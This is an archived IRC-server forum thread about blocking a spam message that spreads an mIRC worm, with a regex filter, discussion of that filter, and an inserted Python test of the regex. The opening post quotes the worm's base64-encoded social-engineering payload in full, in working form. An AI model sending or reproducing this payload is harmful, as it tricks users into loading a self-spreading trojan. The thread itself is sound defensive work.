new one.. similar to matrix2 and nospam ones

These are old archives. They are kept for historic purposes only.
nexus
Posts: 14
Joined: Fri Mar 12, 2004 5:45 pm
Contact:


Post by nexus »

this is sent only via onjoin pm (as you can see if you check it out in mirc with an echo statement ;)):

Code:

<WenW> Want To Be An IRCOp? Try This New Bug Type: //write $decode(bmV3Yg==,m) $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBXYW50IFRvIEJlIEFuIElSQ09wPyBUcnkgVGhpcyBOZXcgQnVnIFR5cGU6AzExIC8vd3JpdGUgJCAkKyBkZWNvZGUoYm1WM1lnPT0sbSkgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzICQgJCsgZGVjb2RlKGJtVjNZZz09LG0pIH0gfQ==,m) | .load -rs $decode(bmV3Yg==,m)
here's my filter, works well so far:

Code:

spamfilter {
     regex "^Want To Be An IRCOp\? Try This New Bug Type: //write (\$decode\(.+=.?,m\)){1} \| \.load -rs \$decode\(.+=.?,m\)$";
     target private;
     action block;
     reason "Spamming users with an mIRC trojan. Type '/unload -rs newb' to remove the trojan.";
};
Syzop
UnrealIRCd head coder
Posts: 2112
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl
Contact:

Post by Syzop »

Ok, added in CVS.

Could you explain why you did (see underlined chars):
regex "^Want To Be An IRCOp\? Try This New Bug Type: //write (\$decode\(.+=.?,m\)){1} \| \.load -rs \$decode\(.+=.?,m\)$";

I removed that, since it seemed useless.
nexus
Posts: 14
Joined: Fri Mar 12, 2004 5:45 pm
Contact:

Post by nexus »

I did that because there are 2 instances of $decode before the first pipe ;)

{1} means the preceding text will be repeated one time.. it does not start counting until after the first instance.. so since $decode gets used twice before the pipe, that (){1} works good ;)


but, I do think the entry you have added in cvs is better, because it will catch more variants that may pop up with $decode (and they will too)
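
Added example, not part of any post in this thread: a Python check of the spamfilter regex against a constructed message with the same shape as the sample, run with and without the `(...){1}` wrapper, plus a data-only decode of the `$decode(...,m)` arguments for inspection. Python's `re` stands in for UnrealIRCd's regex engine, and `build_pm`, the `demo`/`placeholder` strings and the wrapper-free regex are assumptions made for illustration.

```python
import base64
import re

LURE = r"^Want To Be An IRCOp\? Try This New Bug Type: //write "
CALL = r"\$decode\(.+=.?,m\)"
TAIL = r" \| \.load -rs \$decode\(.+=.?,m\)$"
# nexus's regex as posted, including the "(...){1}" wrapper.
WITH_GROUP = LURE + "(" + CALL + "){1}" + TAIL
# Assumption: the same regex minus the wrapper, as Syzop describes his change.
WITHOUT_GROUP = LURE + CALL + TAIL

# Benign question taken from codemastr's post; a filter should let it through.
BENIGN = ("Can anyone help me with $encode? "
          "I'm trying to use it to encode an email attachment.")

def b64(text):
    return base64.b64encode(text.encode()).decode()

def build_pm(name="demo", body="placeholder"):
    """Constructed PM with the sample's shape; the encoded text is harmless."""
    return ("Want To Be An IRCOp? Try This New Bug Type: //write "
            f"$decode({b64(name)},m) $decode({b64(body)},m)"
            f" | .load -rs $decode({b64(name)},m)")

def blocked(regex, message):
    """True if the spamfilter regex would match this private message."""
    return re.search(regex, message) is not None

def group_capture(message):
    """Text captured by the (...){1} group, or None if there is no match."""
    m = re.search(WITH_GROUP, message)
    return m.group(1) if m else None

def decoded_args(message):
    """Base64-decode each $decode(...,m) argument as data, for inspection only."""
    args = re.findall(r"\$decode\(([A-Za-z0-9+/=]+),m\)", message)
    return [base64.b64decode(a).decode("utf-8", "replace") for a in args]

if __name__ == "__main__":
    pm = build_pm()
    print("with wrapper   :", blocked(WITH_GROUP, pm))
    print("without wrapper:", blocked(WITHOUT_GROUP, pm))
    print("group captured :", group_capture(pm))
    print("benign blocked :", blocked(WITH_GROUP, BENIGN))
    print("decoded args   :", decoded_args(pm))
```
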
aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight »

heh, personally, I would just block $decode and $encode altogether...

... for the main reason that you can't exactly verify the contents of any message using $decode or $encode without unencoding it. If it has | characters, you might wind up setting it off :) (unless you use /echo with only one slash).

If people need to send stuff like that, they really should use DCC. It's much easier to verify them, because I could then pop the file in notepad and have a look at what I was sent. AFAIK, opening any file in Notepad/Wordpad/vi[m]/emacs/nano, or heck, cat is pretty much harmless. Or if I really don't trust the file, I would simply hit Ignore on the DCC Get dialog :) .

*edit* Can someone enable right margins for the forum? Because these long regexes play havoc on the layout :P And my 800X600 screen can't handle it :( */edit*
codemastr
Former UnrealIRCd head coder
Posts: 811
Joined: Sat Mar 06, 2004 8:47 pm
Location: United States
Contact:

Post by codemastr »

heh, personally, I would just block $decode and $encode altogether...
* User joins #mirc
<User> Can anyone help me with $encode? I'm trying to use it to encode an email attachment.

And that's why it's a bad idea to do that. $encode and $decode are not inherently bad. First off, I don't use mIRC, so why should I be banned from saying it? It doesn't affect me at all. Second, what if I have a completely valid reason for saying it?
-- codemastr